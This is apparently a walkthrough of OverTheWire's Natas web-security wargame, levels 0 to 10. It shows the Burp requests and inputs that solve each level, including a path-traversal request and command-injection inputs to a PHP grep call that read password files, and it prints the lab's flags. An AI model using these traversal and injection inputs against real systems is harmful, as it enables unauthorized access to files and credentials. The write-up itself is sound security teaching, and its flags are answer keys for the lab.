Natas
This is a collection of challenges built around common web application vulnerabilities.

Level 0

To start off we follow the instructions found here https://overthewire.org/wargames/natas/natas0.html and log into the first challenge at http://natas0.natas.labs.overthewire.org​
This challenge is quite simple and the source code contains the password (CTRL+U in firefox).
Flag
1
gtVrDuiDfck831PqWsLEZy5gyDz1clto
Copied!

Level 1

This challenge works exactly the same, but right clicking is blocked. This isn't a problem though since we're using a keyboard shortcut.
Flag
1
ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
Copied!

Level 2

When looking at the source code we see a file being references at files/pixel.png, navigating to /files shows us that there is a file called users.txt which contains the flag.
Flag
1
sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
Copied!

Level 3

There is a comment in the source code with the reference "Not even Google will find this" which implies a robot.txt file is involved here. checking that file shows us a directory /s3cr3t which contains a users.txt file that contains the flag.
Flag
1
Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
Copied!

Level 4

This page tells us that valid users only come from http://natas5.natas.labs.overthewire.org/, so we use the following burp request and manually set the Referer value to that endpoint.
Burp Request
Flag
1
GET / HTTP/1.1
2
Host: natas4.natas.labs.overthewire.org
3
Referer: http://natas5.natas.labs.overthewire.org/
4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6
Accept-Language: en-US,en;q=0.5
7
Accept-Encoding: gzip, deflate
8
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
9
Connection: close
10
Upgrade-Insecure-Requests: 1
11
Cache-Control: max-age=0
Copied!
1
iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
Copied!

Level 5

This challenge simply tells us that we aren't logged in. Running the request through burp we see that there is a cookie called loggedin that is set to 0 by default. We modify the request and set the value to 1 as shown below.
Burp Request
Flag
1
GET / HTTP/1.1
2
Host: natas5.natas.labs.overthewire.org
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
8
Connection: close
9
Cookie: loggedin=1
10
Upgrade-Insecure-Requests: 1
11
Cache-Control: max-age=0
Copied!
1
aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
Copied!

Level 6

This challenge presents us with a form to submit a secret with, and also provides a link to view the source code of the function. In the source code we see it is including a includes/secret.inc. when navigating to that page and viewing the source we are given the secret to submit. After submitting the secret we get the flag.
Secret
Flag
1
FOEIUWGHFEEUHOFUOIU
Copied!
1
7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
Copied!

Level 7

On this challenge we see two href's using index.php?page=<page> which screams LFI on basic challenges like this. Using the following burp request we can read the file /etc/natas_webpass/natas8.
Burp Request
Flag
1
GET /index.php?page=../../../../../etc/natas_webpass/natas8 HTTP/1.1
2
Host: natas7.natas.labs.overthewire.org
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
5
Accept-Language: en-US,en;q=0.5
6
Accept-Encoding: gzip, deflate
7
Referer: http://natas7.natas.labs.overthewire.org/
8
Authorization: Basic bmF0YXM3Ojd6M2hFRU5qUXRmbHpnblQyOXE3d0F2TU5mWmRoMGk5
9
Connection: close
10
Upgrade-Insecure-Requests: 1
Copied!
1
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
Copied!

Level 8

We are given another secret submission form as well as the source code. This time they are using a custom encoding function and checking it against a pre-encoded string. The secret validation code is shown below, as well as my decoding script. Running this gives us the secret.
Secret Submission
decoder.py
Secret
Flag
1
<?
2
​
3
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
4
​
5
function encodeSecret($secret) {
6
return bin2hex(strrev(base64_encode($secret)));
7
}
8
​
9
if(array_key_exists("submit", $_POST)) {
10
if(encodeSecret($_POST['secret']) == $encodedSecret) {
11
print "Access granted. The password for natas9 is <censored>";
12
} else {
13
print "Wrong secret";
14
}
15
}
16
?>
Copied!
1
import base64
2
​
3
def natasDecode(secret):
4
# first we convert from hex -> string
5
secret = bytearray.fromhex(secret).decode()
6
# then we reverse the string
7
secret = secret[::-1]
8
# then we base64 decode the string
9
secret = base64.b64decode(secret)
10
# then we convert from bytearray to str for printing
11
return secret.decode("utf-8")
12
​
13
​
14
plaintext = natasDecode('3d3d516343746d4d6d6c315669563362')
15
print(plaintext)
Copied!
1
oubWYf2kBq
Copied!
1
W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
Copied!

Level 9

In this challenge we are given a form that is then used to run grep via php. But it is not sanitizing input, so we can manipulate the command to read the flag file instead. The original php as well as the input needed to obtain the flag are shown below:
PHP Grep
Form Input
Flag
1
<?
2
$key = "";
3
​
4
if(array_key_exists("needle", $_REQUEST)) {
5
$key = $_REQUEST["needle"];
6
}
7
​
8
if($key != "") {
9
passthru("grep -i $key dictionary.txt");
10
}
11
?>
Copied!
1
-e ".*" /etc/natas_webpass/natas10;
Copied!
1
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
Copied!

Level 10

This challenge runs the same grep command with php, but it filters the user's input first. Our solution will still work though by removing the ; from our input. This will just have grep search our file as well as the one defined in the php file.
PHP Grep
Form Input
Flag
1
<?
2
$key = "";
3
​
4
if(array_key_exists("needle", $_REQUEST)) {
5
$key = $_REQUEST["needle"];
6
}
7
​
8
if($key != "") {
9
if(preg_match('/[;|&]/',$key)) {
10
print "Input contains an illegal character!";
11
} else {
12
passthru("grep -i $key dictionary.txt");
13
}
14
}
15
?>
Copied!
1
-e ".*" /etc/natas_webpass/natas11
Copied!
1
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
Copied!
Last modified 1yr ago